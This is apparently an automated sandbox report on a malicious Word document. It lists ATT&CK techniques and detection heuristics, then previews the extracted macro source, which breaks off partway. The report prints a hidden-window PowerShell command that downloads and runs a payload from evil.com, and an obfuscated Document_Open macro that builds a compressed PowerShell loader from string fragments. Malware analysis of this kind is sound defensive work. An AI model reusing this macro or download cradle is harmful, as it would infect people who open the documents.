MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that triggers execution. This macro utilizes the Shell() function to launch a PowerShell command. The reconstructed PowerShell command is 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload')"', indicating it's designed to download and execute a second-stage payload from a remote URL. The ClamAV detection further supports its malicious nature.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6606307-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6606307-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19716 bytes |

SHA-256: 6e97d5c80dc4106b09d4af8c23a8ae167f483e01f1b21b95eff045f99551ba76

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "wVEzisYlZQXD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
YEvWA = 16041 / qXVCfO + UhBiSL - cdRpYb - 39254 / bukUdF + nRIEw - UMiWT * 26748 * AiWCo - 53250 * aijbjL * 4526 + bSKlkE
VOPBHR = 74680 / ENCot + ijBIo - kjXkW - 48155 / MLidNG + BoZapJ - NXTJOC * 6157 * ikbPkz - 77213 * iiifaH * 43313 + phvWuG
pYJHkR = 53946 / mDVLzw + YhrKwI - MiMBBR - 16774 / GbPAm + ouNEW - LqavjS * 57862 * BcWKYs - 23681 * vjQKVQ * 94693 + vwLTkn
ZZlVE = 32877 / jnjTi + EcuvJ - doMNut - 62564 / jGLrOw + lzHqa - NjWpzT * 79144 * URXaoA - 32365 * MqcXR * 72819 + coFfnT
bzBGRnPE ("" + SXJEaIWicjz + WzNzuwGdQFAjUh + juzSs + qEujo + jOoTu + jUPHqXz + JOpoRazAZnQOC)
EtAsnB = 44886 / iRrTkJ + otBjI - noXfi - 75753 / pWqjHn + wXFmp - XKWZGN * 83335 * wXMWF - 9816 * FcMFO * 56255 + IbKLw
End Sub
Attribute VB_Name = "QnOqWzcSwY"
Function juzSs()
On Error Resume Next
ULRTF = (pMQUcF - 33678) + 76396 - Zzvln / 11401 - dPoFEj - 73301 * Kbjzdk
nfTmH = 4123 * mEWzl + (50260 * IstclR / KaCwvc / qSitz) + 93201 + 21945 * 38157 * pszofj
owAKPIMNQwG = "pow" + athjbjOVBjZo + FwihCfznFanJAY + "er" + bOzKLuYC + ZjDCMnbdazu + "sh" + UlmnHvSi + rFKpZmL + "e" + fWFQkCNziXz + XGfZYHQHj + "ll " + iMzBwBqPZOXm + CkuwjKshch + "(N" + AOEJZvYW + FLAjjivAAT + "EW" + VWWKAnp + PwpBcKPpbOrn + "-" + ivCiKmchlsv + nOvljhoqOLiD + "O" + KYFZQrrnPzI + HiLzFjdbb + "BJE" + LFqoTkYanGS + TfBpAwzcBSh + "C" + OYTuEis + KADTfZhsH + "t " + jdainbciAJ + jQVzHsCj + "i" + FUAmjTY + KsiXkwlH + "O.S" + JcDXrXD + azFFIdYGhAv + "Tr"
EAcQz = (lBVlYd - 14059) + 50311 - wIPcJ / 96701 - JFmat - 22850 * DGiwzX
whwfRHjWoNz = "EAM" + ZKYYEOjcBDX + lSzMkrXiXz + "REa" + RfqhICwA + SlZQvYJYqohiU + "D" + mnLYwBKwPmjqvt + JrvzOmUvzV + "ER" + kcnKblVP + loHmJdMhOfq + "( " + nYQhATQZbC + nzYPKXlmh + "(" + rccrjRGT + EzlKDVvWCJ + " N" + YWdnSEH + qhRYFXcjIUj + "E" + jAnEGCpQiwWlE + wwCLOsNSU + "W" + zTpupBWfndzOzF + LkunBROj + "-"
fRvjv = (AslbdZ - 47405) + 54949 - dnaNRV / 37071 - AtULY - 31913 * AjrMt
YUAVh = (SIEWa - 70587) + 13336 - OYSkw / 68873 - GzjBh - 49453 * wjFFjW
VPnpTMUjqO = "OB" + oPGGvaDAZ + bSJJLhMwvnbd + "JE" + QauiMjzoXmw + XswturpoC + "Ct " + ffhCucMmiif + RNllnvXL + "IO" + oFwthlmnO + CjBuuuZLh + "." + smbjGEAGTPfMt + ifArrQRqPjjqtA + "CoM" + SjvNMSAfhmHPDX + zzMuLpsc + "p" + MzXOHGWQMczkiQ + KEJCmsMatu + "R" + ncrTmPG + TfBsnKrL + "e" + wPrfnTYJT + UMRTdjldzTJiMq + "s" + JzhUOjis + zEAOGmNLwSjZJa + "Si" + OwmkfoNLOKmS + iZijmhdjNWRAr + "O" + kpHOhRhFDR + pzvAudLkJucoY + "n.D" + jQTiwHniUiD + AUbPdrokRV + "efl" + jVOpMTqcmz + mLjBVbVqcpkp + "ATe"
KhQuS = 88838 + HQlYoH * NXjCi / dRHmOp / jtrlYW + 99262 - 16746 - Msfvn + (59416 / zchUKd)
ENdsoRz = "sTr" + LbksZdjduQNY + SHDELrX + "eaM" + wWJJhVp + lENuPQijLBBXQ + "(" + cOMHZuPJcYlWPU + ENZmvnXs + "[" + bfVifhwLjS + duWulWduTOMt + "I" + rkDprTUD + nusEXEnjwVki + "o." + CAOsCMS + VpNIrbpOZcnG + "m" + ZWObjvaaNVC + FbBFQMIWPJwvF + "EMO" + KBcuLWpV + mjKvcsGEkkmY + "RY" + uiHJNSjalT + sHcUPFNU + "sT" + zbnQqrVZUli + cOfIVEM + "RE" + fQAwcPUjLDsPk + wcpFMwdjmH + "aM]" + jzrPRkG + QrOFEnabNl + " " + IMtPGisCjOqc + jTnbiikAfkaA + "[Sy"
CFZWI = 44292 + kwzKCO * nCAmvU / HnlGN / IjJpGa + 64193 - 98687 - pUUnJw + (39350 / RcPrMd)
FnGuRn = 30442 + ZSEpKD * juJMjS / KFnzU / zGwCZB + 2833 - 74644 - EMBEZO + (83479 / iiNAjz)
uVJQRHmMcvX = "stE" + VzcBHSS + SWBQICoGpwLbst + "M" + IVHdOJsl + EJZwtjTcvVs + ".C" + KLcHGFccDJ + zLHiIdQtcwfhsD + "O" + PwzStzwS + ljuDAAi + "n" + XLunrcUtMjvODd + FLYFzOpw + "v"
PzlcH = 16806 + MzYDW * AHMrBP / fQQlJ / HZkEwz + 15311 - 60246 - jqjwWz + (59954 / SHYEN)
jzYziw = 90894 + EwVLG * YFklqn / CaqvoK / wJVzjz + 85916 - 40095 - PBwTw + (48247 / ruFij)
EGSJhZ = 65458 + qoCHv * XiGzEk / ktUld / zBibL + 12738 - 60218 - rOqLv + (75491 / KIQod)
RzCaOq = "e" + nOknzizTKB + tbEODOYVHCt + "rt]" + z
... (truncated)